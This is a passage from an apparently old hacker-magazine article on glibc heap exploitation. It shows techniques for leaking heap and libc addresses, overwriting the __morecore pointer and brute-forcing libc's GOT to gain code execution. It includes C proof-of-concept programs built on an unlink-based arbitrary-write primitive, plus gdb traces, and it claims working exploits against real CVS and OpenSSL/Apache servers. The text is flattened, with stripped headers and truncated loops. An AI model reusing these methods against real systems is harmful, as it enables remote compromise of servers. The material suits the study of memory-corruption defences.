'help' request, answers with all the available commands. These are stored in a table which is part of the process' DATA, being a static structure. The attacker tries to overwrite part of the structure, and using the 'help' command until he sees a change in the server's answer. Now the attacker knows an absolute address within the process' DATA, being able to predict the location of the process' GOT. --] 4.4.2 Modifying user input - finding shellcode location The following technique allows the attacker to find the exact location of the injected shellcode within the process' address space, being independent of the target process. To obtain the address, the attacker provides the process with some bogus data, which is stored in some part of the process. Then, the basic primitive is used, trying to write 4 bytes in the location the bogus data was previously stored. After this, the server is forced to reply using the supplied bogus data. If the replayed data differs from the original supplied (taken into account any transformation the server may perform on our input), we can be sure that next time we send the same input sequence to the server, it will be stored in the same place. The server's answer may be truncated if a function expecting NULL terminating strings is used to craft it, or to obtain the answer's length before sending it through the network. In fact, the provided input may be stored multiple times in different locations, we will only detect a modification when we hit the location where the server reply is crafted. Note we are able to try two different addresses for each connection, speeding up the bruteforcing mechanism. The main requirement needed to use this trick, is being able to trigger the aa4bmo primitive between the time the supplied data is stored and the time the server's reply is built. Understanding the process allocation behavior, including how is processed each available input command is needed. --] 4.4.2.1 Proof of concept 3 : Hitting the output The following code simulates a process which provides us with a aa4bmo primitive to try to find where a heap allocated output buffer is located: #include #define SZ 256 #define SOMEOFFSET 5 + (rand() % (SZ-1)) #define PREV_INUSE 1 #define IS_MMAP 2 #define OUTPUTSZ 1024 void aa4bmoPrimitive(unsigned long what, unsigned long where){ unsigned long *unlinkMe=(unsigned long*)malloc(SZ*sizeof(unsigned long)); int i = 0; unlinkMe[i++] = -4; unlinkMe[i++] = -4; unlinkMe[i++] = what; unlinkMe[i++] = where-8; for(;i output ## OUTPUT hide and seek ## [.] trying 0x8049ccc (-) output was not @ 0x8049ccc :P [.] trying 0x80498b8 (-) output was not @ 0x80498b8 :P [.] trying 0x8049cd0 (-) output was not @ 0x8049cd0 :P [.] trying 0x8049cd4 (-) output was not @ 0x8049cd4 :P [.] trying 0x8049cd8 (-) output was not @ 0x8049cd8 :P [.] trying 0x8049cdc (-) output was not @ 0x8049cdc :P [.] trying 0x80498c8 (!) you found the output @ 0x80498c8 :( [OOOOOOOO~X^D^H~X^D^HOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO ... OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO] Note the stamped output in the following hexdump: ... 7920 756f 6620 756f 646e 7420 6568 6f20 7475 7570 2074 2040 7830 3038 3934 6338 2038 283a 5b0a 4f4f 4f4f 4f4f 4f4f 98c8 <== 0804 98c8 0804 4f4f 4f4f 4f4f 4f4f 4f4f <== 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 0a5d This bruteforcing mechanism is not completely accurate in some cases, for example, when the target server uses an output buffering scheme. In order to improve the technique, we might mark some part of the supplied data as real shellcode, and other as nops, requiring the nop part to be hit while bruteforcing in order to avoid obtaining an address in the middle of our shellcode. Even better, we could tag each four bytes with a masked offset (i.e. to avoid character \x00 i.e.), when we analyse the reply we will now obtain the expected offset to the shellcode, so being able in a second try to see if actually in that expected address was stored our shellcode, detecting and avoiding this way the risk of our input being split and stored separated in the heap. For example, in the CVS 'Directory' double free exploit [7], unrecognized commands (i.e. 'cucucucucu') are used to populate the server heap. The server does not answer, just stores the provided data in the heap, and waits, until a noop or a command is received. After that, the unrecognized command that was sent is sent back without any modification to the client. We can provide the server with data almost without any size restriction, this data is stored in the heap, until we force it to be replayed to us. However, analysing how our unrecognized command is stored in the heap we find that, instead of what we expected (a single memory chunk with our data), there are other structures mixted with our input: --- HEAP DUMP --- ADDRESS SIZE FD BK [...] chunk 0x80e9998 0x00661 (F) | 0x40018e48 | 0x40018e48 | chunk 0x80e9ff8 0x10008 (A) chunk 0x80fa000 0x00ff9 (F) | 0x40018ed0 | 0x0810b000 | chunk 0x80faff8 0x10008 (A) chunk 0x810b000 0x00ff9 (F) | 0x080fa000 | 0x0811c000 | chunk 0x810bff8 0x10008 (A) chunk 0x813e000 0x04001 (T) sbrk_end 0x8142000 This happens because error messages are buffered when generated, waiting to be flushed, some buffering state internal structures get allocated, and our data is split and stored in fixed size error buffers. --] 4.4.3 Modifying user input - finding libc's DATA In this situation, we are able to provide some input to the vulnerable server which is then sent as output to us again. For example, in the CVS 'Directory' double free() vulnerability, we give the server and invalid command, which is finally echoed back to the client explaining it was an invalid command. If we are able to force a call to free(), to an address pointing in somewhere in the middle of our provided input, before it is sent back to the client, we will be able to get the address of a main_arena's bin. The ability to force a free() pointing to our supplied input, depends on the exploitation scenario, being simple to achieve this in 'double-free' situations. When the server frees our input, it founds a very big sized chunk, so it links it as the first chunk (lonely chunk) of the bin. This depends mainly on the process heap layout, but depending on what we are exploiting it should be easy to predict which size would be needed to create the new free chunk as a lonely one. When frontlink() setups the new free chunk, it saves the bin address in the fw and bk pointer of the chunk, being this what ables us to obtain later the bin address. Note we should be careful with our input chunk, in order to avoid the process crashing while freeing our chunk, but this is quite simple in most cases, i.e. providing a known address near the end of the stack. The user provides as input a 'cushion chunk' to the target process. free() is called in any part of our input, so our especially crafted chunk is inserted in one of the last bins (we may know it's empty from the heap analysis stage, avoiding then a process crash). When the provided cushion chunk is inserted into the bin, the bin's address is written in the fd and bk fields of the chunk's header. --] 4.4.3.1 Proof of concept 4 : Freeing the output The following code creates a 'cushion chunk' as it would be sent to the server, and calls free() at a random location within the chunk (as the target server would do). The cushion chunk writes to a valid address to avoid crashing the process, and its backward and forward pointer are set with the bin's address by the frontlink() macro. Then, the code looks for the wanted addresses within the output, as would do an exploit which received the server answer. #include #define SZ 256 #define SOMEOFFSET 5 + (rand() % (SZ-1)) #define PREV_INUSE 1 #define IS_MMAP 2 unsigned long *aa4bmoPrimitive(unsigned long what, unsigned long where){ unsigned long *unlinkMe=(unsigned long*)malloc(SZ*sizeof(unsigned long)); int i = 0; unlinkMe[i++] = -4; unlinkMe[i++] = -4; unlinkMe[i++] = what; unlinkMe[i++] = where-8; for(;i %p\n",output[i]); return 0; } printf("(x) did not find bin address\n"); } ./freeOutput ## FREEING THE OUTPUT PoC ## (-) creating output buffer... (-) calling free() at random address of output buffer... (-) looking for bin address... (!) found bin address -> 0x4212b1dc We get chunk free with our provided buffer: chunk_free (ar_ptr=0x40018040, p=0x8049ab0) at heapy.c:3221 (gdb) x/20x p 0x8049ab0: 0xfffffd6d 0xfffffd69 0xfffffd65 0xfffffd61 0x8049ac0: 0xfffffd5d 0xfffffd59 0xfffffd55 0xfffffd51 0x8049ad0: 0xfffffd4d 0xfffffd49 0xfffffd45 0xfffffd41 0x8049ae0: 0xfffffd3d 0xfffffd39 0xfffffd35 0xfffffd31 0x8049af0: 0xfffffd2d 0xfffffd29 0xfffffd25 0xfffffd21 (gdb) 0x8049b00: 0xfffffd1d 0xfffffd19 0xfffffd15 0xfffffd11 0x8049b10: 0xfffffd0d 0xfffffd09 0xfffffd05 0xfffffd01 0x8049b20: 0xfffffcfd 0xfffffcf9 0xfffffcf5 0xfffffcf1 0x8049b30: 0xfffffced 0xfffffce9 0xfffffce5 0xfffffce1 0x8049b40: 0xfffffcdd 0xfffffcd9 0xfffffcd5 0xfffffcd1 (gdb) 0x8049b50: 0xfffffccd 0xfffffcc9 0xfffffcc5 0xfffffcc1 0x8049b60: 0xfffffcbd 0xfffffcb9 0xfffffcb5 0xfffffcb1 0x8049b70: 0xfffffcad 0xfffffca9 0xfffffca5 0xfffffca1 0x8049b80: 0xfffffc9d 0xfffffc99 0xfffffc95 0xfffffc91 0x8049b90: 0xfffffc8d 0xfffffc89 0xfffffc85 0xfffffc81 (gdb) 3236 next = chunk_at_offset(p, sz); 3237 nextsz = chunksize(next); 3239 if (next == top(ar_ptr)) /* merge with top */ 3278 islr = 0; 3280 if (!(hd & PREV_INUSE)) /* consolidate backward */ 3294 if (!(inuse_bit_at_offset(next, nextsz))) /* consolidate forward */ 3296 sz += nextsz; 3298 if (!islr && next->fd == last_remainder(ar_ptr)) 3306 unlink(next, bck, fwd); 3315 set_head(p, sz | PREV_INUSE); 3316 next->prev_size = sz; 3317 if (!islr) { 3318 frontlink(ar_ptr, p, sz, idx, bck, fwd); After the frontlink() macro is called with our supplied buffer, it gets the address of the bin in which it is inserted: fronlink(0x8049ab0,-668,126,0x40018430,0x40018430) new free chunk (gdb) x/20x p 0x8049ab0: 0xfffffd6d 0xfffffd65 0x40018430 0x40018430 0x8049ac0: 0xfffffd5d 0xfffffd59 0xfffffd55 0xfffffd51 0x8049ad0: 0xfffffd4d 0xfffffd49 0xfffffd45 0xfffffd41 0x8049ae0: 0xfffffd3d 0xfffffd39 0xfffffd35 0xfffffd31 0x8049af0: 0xfffffd2d 0xfffffd29 0xfffffd25 0xfffffd21 (gdb) c Continuing. (-) looking for bin address... (!) found bin address -> 0x40018430 Let's check the address we obtained: (gdb) x/20x 0x40018430 0x40018430 : 0x40018428 0x40018428 0x08049ab0 0x08049ab0 0x40018440 : 0x40018438 0x40018438 0x40018040 0x000007f0 0x40018450 : 0x00000001 0x00000000 0x00000001 0x0000016a 0x40018460 <__FRAME_END__+12>: 0x0000000c 0x00001238 0x0000000d 0x0000423c 0x40018470 <__FRAME_END__+28>: 0x00000004 0x00000094 0x00000005 0x4001370c And we see it's one of the last bins of the main_arena. Although in this example we hit the cushion chunk in the first try on purpose, this technique can be applied to brute force the location of our output buffer also at the same time (if we don't know it beforehand). --] 4.4.4 Vulnerability based heap memory leak - finding libc's data In this case, the vulnerability itself leads to leaking process memory. For example, in the OpenSSL 'SSLv2 Malformed Client Key Buffer Overflow' vulnerability [6], the attacker is able to overflow a buffer and overwrite a variable used to track a buffer length. When this length is overwritten with a length greater than the original, the process sends the content of the buffer (stored in the process' heap) to the client, sending more information than the originally stored. The attacker obtains then a limited portion of the process heap. --------------------------------------------------------------------------- --] 4.5 Abusing the leaked information The goal of the techniques in this section is to exploit the information gathered using one of the process information leak tricks shown before. --] 4.5.1 Recognizing the arena The idea is to get from the previously gathered information, the address of a malloc's bin. This applies mainly to scenarios were we are able to leak process heap memory. A bin address can be directly obtained if the attacker is able to use the 'freeing the output' technique. The obtained bin address can be used later to find the address of a function pointer to overwrite with the address of our shellcode, as shown in the next techniques. Remembering how the bins are organized in memory (circular double linked lists), we know that a chunk hanging from any bin containing just one chunk will have both pointers (bk and fd) pointing to the head of the list, to the same address, since the list is circular. [bin_n] (first chunk) ptr] ----> [<- chunk ->] [<- chunk ->] [<- fd [ chunk ptr] ----> [<- chunk ->] [<- chunk ->] [<- bk [bin_n+1] (last chunk) . . . [bin_X] ptr] ----> [<- fd [ lonely but interesting chunk ptr] ----> [<- bk . . This is really nice, as it allows us to recognize within the heap which address is pointing to a bin, located in libc's space address more exactly, to some place in the main_arena as this head of the bin list is located in the main_arena. Then, we can look for two equal memory addresses, one next to the other, pointing to libc's memory (looking for addresses of the form 0x4....... is enough for our purpose). We can suppose these pairs of addresses we found are part of a free chunk which is the only one hanging of a bin, we know it looks like... size | fd | bk How easy is to find a lonely chunk in the heap immensity? First, this depends on the exploitation scenario and the exploited process heap layout. For example, when exploiting the OpenSSL bug along different targets, we could always find at least a lonely chunk within the leaked heap memory. Second, there is another scenario in which we will be able to locate a malloc bin, even without the capability to find a lonely chunk. If we are able to find the first or last chunk of a bin, one of its pointers will reference an address within main_arena, while the other one will point to another free chunk in the process heap. So, we'll be looking for pairs of valid pointers like these: [ ptr_2_libc's_memory | ptr_2_process'_heap ] or [ ptr_2_process'_heap | ptr_2_libc's_memory ] We must take into account that this heuristic will not be as accurate as searching for a pair of equal pointers to libc's space address, but as we already said, it's possible to cross-check between multiple possible chunks. Finally, we must remember this depends totally on the way we are abusing the process to read its memory. In case we can read arbitrary addresses of memory, this is not an issue, the problem gets harder as more limited is our mechanism to retrieve remote memory. --] 4.5.2 Morecore Here, we show how to find a function pointer within the libc after obtaining a malloc bin address, using one of the before explained mechanisms. Using the size field of the retrieved chunk header and the bin_index() or smallbin_index() macro we obtain the exact address of the main_arena. We can cross check between multiple supposed lonely chunks that the main_arena address we obtained is the real one, depending on the quantity of lonely chunks pairs we'll be more sure. As long as the process doesn't crash, we may retrieve heap memory several times, as main_arena won't change its location. Moreover, I think it wouldn't be wrong to assume main_arena is located in the same address across different processes (this depends on the address on which the libc is mapped). This may even be true across different servers processes, allowing us to retrieve the main_arena through a leak in a process different from the one being actively exploited. Just 32 bytes before &main_arena[0] is located __morecore. Void_t *(*__morecore)() = __default_morecore; MORECORE() is the name of the function that is called through malloc code in order to obtain more memory from the operating system, it defaults to sbrk(). Void_t * __default_morecore (); Void_t *(*__morecore)() = __default_morecore; #define MORECORE (*__morecore) The following disassembly shows how MORECORE is called from chunk_alloc() code, an indirect call to __default_morecore is performed by default: : mov 0x64c(%ebx),%eax : sub $0xc,%esp : push %esi : call *(%eax) where $eax points to __default_morecore (gdb) x/x $eax 0x4212df80 <__morecore>: 0x4207e034 (gdb) x/4i 0x4207e034 0x4207e034 <__default_morecore>: push %ebp 0x4207e035 <__default_morecore+1>: mov %esp,%ebp 0x4207e037 <__default_morecore+3>: push %ebx 0x4207e038 <__default_morecore+4>: sub $0x10,%esp MORECORE() is called from the malloc() algorithm to extend the memory top, requesting the operating system via the sbrk. MORECORE() gets called twice from malloc_extend_top() brk = (char*)(MORECORE (sbrk_size)); ... /* Allocate correction */ new_brk = (char*)(MORECORE (correction)); which is called by chunk_alloc(): /* Try to extend */ malloc_extend_top(ar_ptr, nb); Also, MORECORE is called by main_trim() and top_chunk(). We just need to sit and wait until the code reaches any of these points. In some cases it may be necessary to arrange things in order to avoid the code crashing before. The morecore function pointer is called each time the heap needs to be extended, so forcing the process to allocate a lot of memory is recommended after overwriting the pointer. In case we are not able to avoid a crash before taking control of the process, there's no problem (unless the server dies completely), as we can expect the libc to be mapped in the same address in most cases. --] 4.5.2.1 Proof of concept 5 : Jumping with morecore The following code just shows to get the required information from a freed chunk, calculates the address of __morecore and forces a call to MORECORE() after having overwritten it. [jp@vaiolator heapy]$ ./heapy (-) lonely chunk was freed, gathering information... (!) sz = 520 - bk = 0x4212E1A0 - fd = 0x4212E1A0 (!) the chunk is in bin number 64 (!) &main_arena[0] @ 0x4212DFA0 (!) __morecore @ 0x4212DF80 (-) overwriting __morecore... (-) forcing a call to MORECORE()... Segmentation fault Let's look what happened with gdb, we'll also be using a simple modified malloc in the form of a shared library to know what is going on inside malloc's internal structures. [jp@vaiolator heapy]$ gdb heapy GNU gdb Red Hat Linux (5.2-2) Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (gdb) r Starting program: /home/jp/cerebro//heapy/morecore (-) lonely chunk was freed, gathering information... (!) sz = 520 - bk = 0x4212E1A0 - fd = 0x4212E1A0 (!) the chunk is in bin number 64 (!) &main_arena[0] @ 0x4212DFA0 (!) __morecore @ 0x4212DF80 (-) overwriting __morecore... (-) forcing a call to MORECORE()... Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () Taking a look at the output step by step: First we alloc our lonely chunk: chunk = (unsigned int*)malloc(CHUNK_SIZE); (gdb) x/8x chunk-1 0x80499d4: 0x00000209 0x00000000 0x00000000 0x00000000 0x80499e4: 0x00000000 0x00000000 0x00000000 0x00000000 Note we call malloc() again with another pointer, letting this aux pointer be the chunk next to the top_chunk... to avoid the differences in the way it is handled when freed with our purposes (remember in this special case the chunk would be coalesced with the top_chunk without getting linked to any bin): aux = (unsigned int*)malloc(0x0); [1422] MALLOC(512) - CHUNK_ALLOC(0x40019bc0,520) - returning 0x8049a18 from top_chunk - new top 0x8049c20 size 993 [1422] MALLOC(0) - CHUNK_ALLOC(0x40019bc0,16) - returning 0x8049c20 from top_chunk - new top 0x8049c30 size 977 This is the way the heap looks like up to now... --- HEAP DUMP --- ADDRESS SIZE FLAGS sbrk_base 0x80499f8 chunk 0x80499f8 33(0x21) (inuse) chunk 0x8049a18 521(0x209) (inuse) chunk 0x8049c20 17(0x11) (inuse) chunk 0x8049c30 977(0x3d1) (top) sbrk_end 0x804a000 --- HEAP LAYOUT --- |A||A||A||T| --- BIN DUMP --- ar_ptr = 0x40019bc0 - top(ar_ptr) = 0x8049c30 No bins at all exist now, they are completely empty. After that we free him: free(chunk); [1422] FREE(0x8049a20) - CHUNK_FREE(0x40019bc0,0x8049a18) - fronlink(0x8049a18,520,64,0x40019dc0,0x40019dc0) - new free chunk (gdb) x/8x chunk-1 0x80499d4: 0x00000209 0x4212e1a0 0x4212e1a0 0x00000000 0x80499e4: 0x00000000 0x00000000 0x00000000 0x00000000 The chunk was freed and inserted into some bin... which was empty as this was the first chunk freed. So this is a 'lonely chunk', the only chunk in one bin. Here we can see both bk and fd pointing to the same address in libc's memory, let's see how the main_arena looks like now: 0x4212dfa0 : 0x00000000 0x00010000 0x08049be8 0x4212dfa0 0x4212dfb0 : 0x4212dfa8 0x4212dfa8 0x4212dfb0 0x4212dfb0 0x4212dfc0 : 0x4212dfb8 0x4212dfb8 0x4212dfc0 0x4212dfc0 0x4212dfd0 : 0x4212dfc8 0x4212dfc8 0x4212dfd0 0x4212dfd0 0x4212dfe0 : 0x4212dfd8 0x4212dfd8 0x4212dfe0 0x4212dfe0 0x4212dff0 : 0x4212dfe8 0x4212dfe8 0x4212dff0 0x4212dff0 0x4212e000 : 0x4212dff8 0x4212dff8 0x4212e000 0x4212e000 0x4212e010 : 0x4212e008 0x4212e008 0x4212e010 0x4212e010 0x4212e020 : 0x4212e018 0x4212e018 0x4212e020 0x4212e020 0x4212e030 : 0x4212e028 0x4212e028 0x4212e030 0x4212e030 ... ... 0x4212e180 : 0x4212e178 0x4212e178 0x4212e180 0x4212e180 0x4212e190 : 0x4212e188 0x4212e188 0x4212e190 0x4212e190 0x4212e1a0 : 0x4212e198 0x4212e198 0x080499d0 0x080499d0 0x4212e1b0 : 0x4212e1a8 0x4212e1a8 0x4212e1b0 0x4212e1b0 0x4212e1c0 : 0x4212e1b8 0x4212e1b8 0x4212e1c0 0x4212e1c0 Note the completely just initialized main_arena with all its bins pointing to themselves, and the just added free chunk to one of the bins... (gdb) x/4x 0x4212e1a0 0x4212e1a0 : 0x4212e198 0x4212e198 0x080499d0 0x080499d0 Also, both bin pointers refer to our lonely chunk. Let's take a look at the heap in this moment: --- HEAP DUMP --- ADDRESS SIZE FLAGS sbrk_base 0x80499f8 chunk 0x80499f8 33(0x21) (inuse) chunk 0x8049a18 521(0x209) (free) fd = 0x40019dc0 | bk = 0x40019dc0 chunk 0x8049c20 16(0x10) (inuse) chunk 0x8049c30 977(0x3d1) (top) sbrk end 0x804a000 --- HEAP LAYOUT --- |A||64||A||T| --- BIN DUMP --- ar_ptr = 0x40019bc0 - top(ar_ptr) = 0x8049c30 bin -> 64 (0x40019dc0) free_chunk 0x8049a18 - size 520 Using the known size of the chunk, we know in which bin it was placed, so we can get main_arena's address and, finally, __morecore. (gdb) x/16x 0x4212dfa0-0x20 0x4212df80 <__morecore>: 0x4207e034 0x00000000 0x00000000 0x00000000 0x4212df90 <__morecore+16>: 0x00000000 0x00000000 0x00000000 0x00000000 0x4212dfa0 : 0x00000000 0x00010000 0x08049be8 0x4212dfa0 0x4212dfb0 : 0x4212dfa8 0x4212dfa8 0x4212dfb0 0x4212dfb0 Here, by default __morecore points to __default_morecore: (gdb) x/20i __morecore 0x4207e034 <__default_morecore>: push %ebp 0x4207e035 <__default_morecore+1>: mov %esp,%ebp 0x4207e037 <__default_morecore+3>: push %ebx 0x4207e038 <__default_morecore+4>: sub $0x10,%esp 0x4207e03b <__default_morecore+7>: call 0x4207e030 0x4207e040 <__default_morecore+12>: add $0xb22cc,%ebx 0x4207e046 <__default_morecore+18>: mov 0x8(%ebp),%eax 0x4207e049 <__default_morecore+21>: push %eax 0x4207e04a <__default_morecore+22>: call 0x4201722c <_r_debug+33569648> 0x4207e04f <__default_morecore+27>: mov 0xfffffffc(%ebp),%ebx 0x4207e052 <__default_morecore+30>: mov %eax,%edx 0x4207e054 <__default_morecore+32>: add $0x10,%esp 0x4207e057 <__default_morecore+35>: xor %eax,%eax 0x4207e059 <__default_morecore+37>: cmp $0xffffffff,%edx 0x4207e05c <__default_morecore+40>: cmovne %edx,%eax 0x4207e05f <__default_morecore+43>: mov %ebp,%esp 0x4207e061 <__default_morecore+45>: pop %ebp 0x4207e062 <__default_morecore+46>: ret 0x4207e063 <__default_morecore+47>: lea 0x0(%esi),%esi 0x4207e069 <__default_morecore+53>: lea 0x0(%edi,1),%edi To conclude, we overwrite __morecore with a bogus address, and force malloc to call __morecore: *(unsigned int*)morecore = 0x41414141; chunk=(unsigned int*)malloc(CHUNK_SIZE*4); [1422] MALLOC(2048) - CHUNK_ALLOC(0x40019bc0,2056) - extending top chunk - previous size 976 Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) bt #0 0x41414141 in ?? () #1 0x4207a148 in malloc () from /lib/i686/libc.so.6 #2 0x0804869d in main (argc=1, argv=0xbffffad4) at heapy.c:52 #3 0x42017589 in __libc_start_main () from /lib/i686/libc.so.6 (gdb) frame 1 #1 0x4207a148 in malloc () from /lib/i686/libc.so.6 (gdb) x/i $pc-0x5 0x4207a143 : call 0x4207a2f0 (gdb) disass chunk_alloc Dump of assembler code for function chunk_alloc: ... 0x4207a8ac : mov 0x64c(%ebx),%eax 0x4207a8b2 : sub $0xc,%esp 0x4207a8b5 : push %esi 0x4207a8b6 : call *(%eax) At this point we see chunk_alloc trying to jump to __morecore (gdb) x/x $eax 0x4212df80 <__morecore>: 0x41414141 #include #include /* some malloc code... */ #define MAX_SMALLBIN 63 #define MAX_SMALLBIN_SIZE 512 #define SMALLBIN_WIDTH 8 #define is_small_request(nb) ((nb) < MAX_SMALLBIN_SIZE - SMALLBIN_WIDTH) #define smallbin_index(sz) (((unsigned long)(sz)) >> 3) #define bin_index(sz) \ (((((unsigned long)(sz)) >> 9) == 0) ? (((unsigned long)(sz)) >> 3):\ ((((unsigned long)(sz)) >> 9) <= 4) ? 56 + (((unsigned long)(sz)) >> 6):\ ((((unsigned long)(sz)) >> 9) <= 20) ? 91 + (((unsigned long)(sz)) >> 9):\ ((((unsigned long)(sz)) >> 9) <= 84) ? 110 + (((unsigned long)(sz)) >> 12):\ ((((unsigned long)(sz)) >> 9) <= 340) ? 119 + (((unsigned long)(sz)) >> 15):\ ((((unsigned long)(sz)) >> 9) <= 1364) ? 124 + (((unsigned long)(sz)) >> 18):\ 126) #define SIZE_MASK 0x3 #define CHUNK_SIZE 0x200 int main(int argc, char *argv[]){ unsigned int *chunk,*aux,sz,bk,fd,bin,arena,morecore; chunk = (unsigned int*)malloc(CHUNK_SIZE); aux = (unsigned int*)malloc(0x0); free(chunk); printf("(-) lonely chunk was freed, gathering information...\n"); sz = chunk[-1] & ~SIZE_MASK; fd = chunk[0]; bk = chunk[1]; if(bk==fd) printf("\t(!) sz = %u - bk = 0x%X - fd = 0x%X\n",sz,bk,fd); else printf("\t(X) bk != fd ...\n"),exit(-1); bin = is_small_request(sz)? smallbin_index(sz) : bin_index(sz); printf("\t(!) the chunk is in bin number %d\n",bin); arena = bk-bin*2*sizeof(void*); printf("\t(!) &main_arena[0] @ 0x%X\n",arena); morecore = arena-32; printf("\t(!) __morecore @ 0x%X\n",morecore); printf("(-) overwriting __morecore...\n"); *(unsigned int*)morecore = 0x41414141; printf("(-) forcing a call to MORECORE()...\n"); chunk=(unsigned int*)malloc(CHUNK_SIZE*4); return 7; } This technique works even when the process is loaded in a randomized address space, as the address of the function pointer is gathered in runtime from the targeted process. The mechanism is fully generic, as every process linked to the glibc can be exploited this way. Also, no bruteforcing is needed, as just one try is enough to exploit the process. On the other hand, this technique is not longer useful in newer libcs, i.e. 2.2.93, a for the changed suffered by malloc code. A new approach is suggested later to help in exploitation of these libc versions. Morecore idea was successfully tested on different glibc versions and Linux distributions default installs: Debian 2.2r0, Mandrake 8.1, Mandrake 8.2, Redhat 6.1, Redhat 6.2, Redhat 7.0, Redhat 7.2, Redhat 7.3 and Slackware 2.2.19 (libc-2.2.3.so). Exploit code using this trick is able to exploit the vulnerable OpenSSL/Apache servers without any hardcoded addresses in at least the above mentioned default distributions. --] 4.5.3 Libc's GOT bruteforcing In case the morecore trick doesn't work (we can try, as just requires one try), meaning probably that our target is using a newer libc, we still have the obtained glibc's bin address. We know that above that address is going to be located the glibc's GOT. We just need to bruteforce upwards until hitting any entry of a going to be called libc function. This bruteforce mechanism may take a while, but not more time that should be needed to bruteforce the main object's GOT (in case we obtained its aproximate location some way). To speed up the process, the bruteforcing start point should be obtained by adjusting the retrieved bin address with a fixed value. This value should be enough to avoid corrupting the arena to prevent crashing the process. Also, the bruteforcing can be performed using a step size bigger than one. Using a higher step value will need a less tries, but may miss the GOT. The step size should be calculated considering the GOT size and the number of GOT entries accesses between each try (if a higher number of GOT entries are used, it's higher the probability of modifying an entry that's going to be accessed). After each try, it is important to force the server to perform as many actions as possible, in order to make it call lots of different libc calls so the probability of using the GOT entry that was overwritten is higher. Note the bruteforcing mechanism may crash the process in several ways, as it is corrupting libc data. As we obtained the address in runtime, we can be sure we are bruteforcing the right place, even if the target is randomizing the process/lib address space, and that we will end hitting some GOT entry. In a randomized load address scenario, we'll need to hit a GOT entry before the process crashes to exploit the obtained bin address if there is no relationship between the load addresses in the crashed process (the one we obtained the bin address from) and the new process handling our new requests (i.e. forked processes may inherit father's memory layout in some randomization implementations). However, the bruteforcing mechanism can take into account the already tried offsets once it has obtained the new bin address, as the relative offset between the bin and the GOT is constant. Moreover, this technique applies to any process linked to the glibc. Note that we could be able to exploit a server bruteforcing some specific function pointers (i.e. located in some structures such as network output buffers), but these approach is more generic. The libc's GOT bruteforcing idea was successfully tested in Redhat 8.0, Redhat 7.2 and Redhat 7.1 default installations. Exploit code bruteforcing libc's GOT is able to exploit the vulnerable CVS servers without any hardcoded addresses in at least the above mentioned default distributions. --] 4.5.3.1 Proof of concept 6 : Hinted libc's GOT bruteforcing The following code bruteforces itself. The process tries to find himself, to finally end in an useless endless loop. #include #include #define ADJUST 0x200 #define STEP 0x2 #define LOOP_SC "\xeb\xfe" #define LOOP_SZ 2 #define SC_SZ 512 #define OUTPUT_SZ 64 * 1024 #define SOMEOFFSET(x) 11 + (rand() % ((x)-1-11)) #define SOMECHUNKSZ 32 + (rand() % 512) #define PREV_INUSE 1 #define IS_MMAP 2 #define NON_MAIN_ARENA 4 unsigned long *aa4bmoPrimitive(unsigned long what, unsigned long where,unsigned long sz){ unsigned long *unlinkMe; int i=0; if(sz<13) sz = 13; unlinkMe=(unsigned long*)malloc(sz*sizeof(unsigned long)); unlinkMe[i++] = -4; unlinkMe[i++] = -4; unlinkMe[i++] = -4; unlinkMe[i++] = what; unlinkMe[i++] = where-8; unlinkMe[i++] = -4; unlinkMe[i++] = -4; unlinkMe[i++] = -4; unlinkMe[i++] = what; unlinkMe[i++] = where-8; for(;i> 3) #define bin_index(sz) \ (((((unsigned long)(sz)) >> 9) == 0) ? (((unsigned long)(sz)) >> 3):\ ((((unsigned long)(sz)) >> 9) <= 4) ? 56 + (((unsigned long)(sz)) >> 6):\ ((((unsigned long)(sz)) >> 9) <= 20) ? 91 + (((unsigned long)(sz)) >> 9):\ ((((unsigned long)(sz)) >> 9) <= 84) ? 110 + (((unsigned long)(sz)) >> 12):\ ((((unsigned long)(sz)) >> 9) <= 340) ? 119 + (((unsigned long)(sz)) >> 15):\ ((((unsigned long)(sz)) >> 9) <= 1364) ? 124 + (((unsigned long)(sz)) >> 18):\ 126) From source documentation we know that 'an arena is a configuration of malloc_chunks together with an array of bins. One or more 'heaps' are associated with each arena, except for the 'main_arena', which is associated only with the 'main heap', i.e. the conventional free store obtained with calls to MORECORE()...', which is the one we are interested in. This is the way an arena looks like... typedef struct _arena { mbinptr av[2*NAV + 2]; struct _arena *next; size_t size; #if THREAD_STATS long stat_lock_direct, stat_lock_loop, stat_lock_wait; #endif 'av' is the array where bins are kept. These are the macros used along the source code to access the bins, we can see the first two bins are never indexed; they refer to the topmost chunk, the last_remainder chunk and a bitvector used to improve seek time, though this is not really important for us. /* bitvector of nonempty blocks */ #define binblocks(a) (bin_at(a,0)->size) /* The topmost chunk */ #define top(a) (bin_at(a,0)->fd) /* remainder from last split */ #define last_remainder(a) (bin_at(a,1)) #define bin_at(a, i) BOUNDED_1(_bin_at(a, i)) #define _bin_at(a, i) ((mbinptr)((char*)&(((a)->av)[2*(i)+2]) - 2*SIZE_SZ)) Finally, the main_arena... #define IAV(i) _bin_at(&main_arena, i), _bin_at(&main_arena, i) static arena main_arena = { { 0, 0, IAV(0), IAV(1), IAV(2), IAV(3), IAV(4), IAV(5), IAV(6), IAV(7), IAV(8), IAV(9), IAV(10), IAV(11), IAV(12), IAV(13), IAV(14), IAV(15), IAV(16), IAV(17), IAV(18), IAV(19), IAV(20), IAV(21), IAV(22), IAV(23), IAV(24), IAV(25), IAV(26), IAV(27), IAV(28), IAV(29), IAV(30), IAV(31), IAV(32), IAV(33), IAV(34), IAV(35), IAV(36), IAV(37), IAV(38), IAV(39), IAV(40), IAV(41), IAV(42), IAV(43), IAV(44), IAV(45), IAV(46), IAV(47), IAV(48), IAV(49), IAV(50), IAV(51), IAV(52), IAV(53), IAV(54), IAV(55), IAV(56), IAV(57), IAV(58), IAV(59), IAV(60), IAV(61), IAV(62), IAV(63), IAV(64), IAV(65), IAV(66), IAV(67), IAV(68), IAV(69), IAV(70), IAV(71), IAV(72), IAV(73), IAV(74), IAV(75), IAV(76), IAV(77), IAV(78), 